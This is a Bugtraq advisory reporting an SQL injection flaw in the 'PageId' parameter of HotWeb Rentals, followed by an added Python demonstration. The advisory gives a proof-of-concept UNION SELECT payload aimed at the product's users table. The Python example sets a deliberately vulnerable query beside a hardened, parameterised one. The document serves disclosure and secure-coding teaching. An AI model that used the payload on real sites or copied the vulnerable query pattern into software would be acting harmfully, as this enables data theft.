
Bugtraq mailing list archives

HotWeb Rentals "PageId" SQL Injection Vulnerability
From: "non customers" <non-customers () operamail com>
Date: Tue, 28 Dec 2010 00:57:13 +0100

HotWeb Rentals "PageId" SQL Injection Vulnerability

PRODUCT >>> http://www.hotwebscripts.co.uk/

Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users

-- 
non-customers crew | http://rock-madrid.com/
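
The flaw class described in the advisory, shown beside a hardened lookup. This is an added example, not code from the advisory or from the vendor: the product's ASP source and schema are not on the page, so the nine-column `pages` table, the `users` row, and the function names are constructed, and SQLite stands in for the real backend.

```python
import sqlite3
from urllib.parse import unquote_plus

# PageId value from the advisory's PoC, decoded the way a web server would decode it.
POC_VALUE = unquote_plus("-15+union+select+11,22,33,44,55,66,77,88,99+from+users")

def make_db():
    """Constructed schema: nine columns so the PoC's column count lines up."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, "
               "c4, c5, c6, c7, c8, c9)")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO pages VALUES (15, 'Home', 'Welcome', 0, 0, 0, 0, 0, 0)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def get_page_vulnerable(db, page_id):
    # The pattern the advisory describes: request input concatenated into SQL text,
    # so the input is parsed as SQL syntax instead of being treated as a value.
    return db.execute("SELECT * FROM pages WHERE id = " + page_id).fetchall()

def get_page_hardened(db, page_id):
    # 1) Allow-list validation: PageId must be ASCII digits only.
    if not (page_id.isascii() and page_id.isdigit()):
        return None  # reject; the caller should answer with HTTP 400
    # 2) Bound parameter: the value never becomes part of the SQL text.
    return db.execute("SELECT * FROM pages WHERE id = ?", (int(page_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_page_vulnerable(db, POC_VALUE))
    print("hardened:  ", get_page_hardened(db, POC_VALUE))
    print("legit id:  ", get_page_hardened(db, "15"))
```

In the vulnerable function the UNION branch returns a row built from the second SELECT; the hardened function rejects the same input before any query runs.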





